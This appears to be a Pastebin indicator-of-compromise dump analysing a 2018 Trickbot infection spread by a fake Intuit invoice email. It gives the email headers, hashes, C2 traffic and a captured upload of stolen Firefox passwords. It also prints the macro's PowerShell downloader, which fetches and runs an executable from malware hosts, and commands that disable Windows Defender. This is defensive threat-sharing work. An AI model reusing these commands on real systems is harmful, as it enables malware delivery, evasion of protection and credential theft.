Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #Trickbot #X97M #macro
- https://myonlinesecurity.co.uk/trickbot-delivered-via-fake-intuit-fw-invoice-3989021-email/
- email_headers
- --------------
- Received: from intuit-invoice.co.uk (hosted-by.leaseweb.com [5.79.78.24] (may be forged))
- by mailsrv1.victim.com (8.15.2/8.15.2) with ESMTP id w8OBMBKB095862
- for <user1@mev.victim.com>; Mon, 24 Sep 2018 14:22:11 +0300 (EEST)
- (envelope-from J.Monta-user1=mev.victim.com@intuit-invoice.co.uk)
- Received: by intuit-invoice.co.uk id hl34cda5qi05 for <user1@mev.victim.com>;
- Mon, 24 Sep 2018 07:07:32 -0400 (envelope-from <J.Monta-user1=mev.victim.com@intuit-invoice.co.uk>)
- Subject: FW: Invoice #3989021
- From: "Intuit Invoice" <J.Monta@intuit-invoice.co.uk>
- files
- --------------
- SHA-256 b24f811c6f7a930e78d3769c39f95d899b089ac4b805f3654b37922b41c6a233
- File name Invoice3989021.xls
- File size 56.5 KB
- SHA-256 f1fca2ff7712a60158068b151b5ebf0c73826b50cb8be136fc17ba8c7c2d0107
- File name Client dll for Pim Index Maintenance
- File size 361 KB
- h11p: \eaucardinal{.} com/perfo.rmance
- h11p: \abogadodetexas{.} com/perfo.rmance
- activity
- -------------
- proc
- --------------
- "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e
- cmd /c powershell "'powershell ""function iter([string] $totalfilesize){(new-object system.net.webclient).downloadfile($totalfilesize,''%tmp%\very.exe'');start-process ''%tmp%\very.exe'';}try{iter(''http://eaucardinal{.} com/perfo.rmance'')}catch{iter(''http://abogadodetexas{.} com/perfo.rmance'')}'"" | out-file -encoding ascii -filepath %tmp%\parser.bat; start-process '%tmp%\parser.bat' -windowstyle hidden"
- powershell "'powershell ""function iter([string] $totalfilesize){(new-object system.net.webclient).downloadfile($totalfilesize,''C:\tmp\very.exe'');start-process ''C:\tmp\very.exe'';}try{iter(''http://eaucardinal{.} com/perfo.rmance'')}catch{iter(''http://abogadodetexas{.} com/perfo.rmance'')}'"" | out-file -encoding ascii -filepath C:\tmp\parser.bat; start-process 'C:\tmp\parser.bat' -windowstyle hidden"
- cmd /c ""C:\tmp\parser.bat" "
- powershell "function iter([string] $totalfilesize){(new-object system.net.webclient).downloadfile($totalfilesize,'C:\tmp\very.exe');start-process 'C:\tmp\very.exe';}try{iter('http://eaucardinal{.} com/perfo.rmance')}catch{iter('http://abogadodetexas{.} com/perfo.rmance')}
- "C:\tmp\very.exe"
- C:\Windows\SysWOW64\cmd.exe
- sc stop WinDefend
- sc delete WinDefend
- /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
- powershell Set-MpPreference -DisableRealtimeMonitoring $true
- C:\Users\operator\AppData\Roaming\AIMT\vesy.exe
- C:\Windows\SysWOW64\cmd.exe
- sc stop WinDefend
- sc delete WinDefend
- /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
- C:\Windows\system32\svchost.exe
- svchost.exe
- svchost.exe
- :\Windows\system32\svchost.exe -k netsvcs
- C:\Windows\system32\taskeng.exe {6A47CA07-7739-4626-8919-0200D91B9F0B} S-1-5-21-136527031-2493574210-1221074019-1000:APM11\operator:Interactive:[1]
- C:\Users\operator\AppData\Roaming\AIMT\vesy.exe
- C:\Windows\SysWOW64\cmd.exe
- /c sc stop WinDefend
- sc delete WinDefend
- C:\Windows\SysWOW64\cmd.exe
- /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
- C:\Windows\system32\svchost.exe
- persist
- --------------
- \Msntcs Client dll for Pim Index Maintenance
- Client dll for Pim Index Maintenance
- c:\users\operator\appdata\roaming\aimt\vesy.exe 24.09.2018 11:16
- netwrk
- --------------
- 198.50.100.170 eaucardinal{.} com GET /perfo.rmance HTTP/1.1 301
- 198.50.100.170 www.eaucardinal{.} com GET /perfo.rmance HTTP/1.1 404
- 23.229.233.135 abogadodetexas{.} com GET /perfo.rmance HTTP/1.1 200 !This program cannot be run in DOS mode.
- 52.1.46.34 checkip.amazonaws.com GET / HTTP/1.1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) 200 Public IP
- 138.34.45.133 138.34.45.133 POST /ser0924/APM11_W617601.id/81/ HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64;
- 138.34.45.133 138.34.45.133 POST /ser0924/APM11_W617601.id/81/ HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64;
- POST /ser0924/APM11_W617601.id/81/ HTTP/1.1
- Accept: */*
- User-Agent: Mozilla/4.0
- Host: 138.34.45.133
- -----------NZYIBXEQQVBQBMZW
- Content-Disposition: form-data; name="data"
- http://www.i.ua|oper|********(saved passwd)
- https://www.ukr.net|11oper|********(saved passwd)
- https://accounts.google.com|oper11.wdma@gmail.com|********(saved passwd)
- https://login.live.com|oper11.wdma@gmail.com|********(saved passwd)
- -----------NZYIBXEQQVBQBMZW
- Content-Disposition: form-data; name="source"
- firefox passwords
- -----------NZYIBXEQ
- powershell.exe 2336 TCP 10.0.2.15 49693 198.50.100.170 80 ESTABLISHED
- powershell.exe 2336 TCP 10.0.2.15 49694 198.50.100.170 80 ESTABLISHED
- powershell.exe 2336 TCP 10.0.2.15 49695 23.229.233.135 80 ESTABLISHED
- svchost.exe 2540 TCP 10.0.2.15 49696 216.239.32.21 80 ESTABLISHED
- svchost.exe 2540 TCP 10.0.2.15 49697 216.239.32.21 443 ESTABLISHED
- svchost.exe 2540 TCP 10.0.2.15 49698 107.181.174.176 443 SYN_SENT
- svchost.exe 2540 TCP apm11 49696 any-in-2015.1e100.net http ESTABLISHED
- svchost.exe 2540 TCP apm11 49697 any-in-2015.1e100.net https ESTABLISHED
- svchost.exe 2540 TCP apm11 49699 vds5605.example.com https SYN_SENT
- # # #
- https://www.virustotal.com/#/file/b24f811c6f7a930e78d3769c39f95d899b089ac4b805f3654b37922b41c6a233/community
- https://www.virustotal.com/#/file/f1fca2ff7712a60158068b151b5ebf0c73826b50cb8be136fc17ba8c7c2d0107/community
- https://analyze.intezer.com/#/analyses/7b1c2c08-1538-4aa1-a0b4-c4a66c7dbcc9
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement